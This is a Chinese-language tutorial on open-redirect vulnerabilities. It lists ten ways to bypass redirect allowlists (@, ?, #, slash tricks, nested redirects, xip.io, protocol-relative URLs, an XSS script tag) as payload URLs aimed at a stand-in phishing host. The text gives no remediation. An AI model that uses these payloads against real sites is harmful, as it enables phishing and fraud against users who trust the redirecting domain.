URL任意跳轉漏洞

漏洞描述

系統信任了用戶傳入的任意URL，導致URL跳轉被惡意利用。
URL跳轉漏洞目前在國內總體重視程度還遠遠不夠，不過像騰訊，百度等大型互聯網廠商已經在重視並修復該類型漏洞。目前URL跳轉漏洞利用方式很多，本文主要講解攻擊者是如何繞過安全策略限制實現任意URL跳轉。目前該漏洞多用於欺騙釣魚
上一張案例圖：

漏洞原理

目前不管是瀏覽器，QQ，微信等都對釣魚鏈接做了屏蔽或是標記處理。猜測原理是通過大數據處理識別分析得出的結果。但是如果通過URL跳轉漏洞，能提高用戶信任度的同時，還能繞過防護，達到欺詐目的。

限制繞過

我們假設：
跳轉鏈接http://www.xxx.com?url=http://test.com
其中http://test.com爲正常跳轉鏈接
惡意釣魚鏈接爲fishing.com，ip地址爲192.168.1.1
1 @符號繞過

http://www.xxx.com?url=http://[email protected]

2 問號繞過

http://www.xxx.com?url=http://fishing.com?test.com

3 # 繞過

http://www.xxx.com?url=http://fishing.com#test.com

4 正反斜槓繞過

http://www.xxx.com?url=http://fishing.com/test.com
http://www.xxx.com?url=http://fishing.com\test.com
http://www.xxx.com?url=http://fishing.com\\test.com
http://www.xxx.com?url=http://fishing.com\.test.com

5 白名單
部分網站對跳轉做了內容檢測，比如白名單允許包含fish字符的鏈接通過，那麼我們就能找包含fish的鏈接就行跳轉。

http://www.xxx.com?url=http://fishing.com

6 多重跳轉
例如 網站存在跳轉http://www.xxx.com?url=http://test.com,但是限制僅限於xxx.com,那麼我們爲了達到目的可以先跳轉到xxx.com，在跳轉到fishing.com

http://www.xxx.com?url=http://test.com?url=fishing.com

7 功能觸發跳轉

某些時候在修改鏈接後加載沒反應，可能需要觸發某功能來進行跳轉，比如登錄，刪除等，具體看跳抓鏈接處於那個功能點。

8 xip.io繞過

http://www.xxx.com?url=http://test.com.192.168.1.1.xip.io

9 協議繞過
刪除或切換http和https，或者增加多個斜槓

http://www.xxx.com?url=//fishing.com#test.com
http://www.xxx.com?url=///fishing.com#test.com

10 xss跳轉
xss情況比較多，根據實際情況而定

<script src=https://fishing.com></script>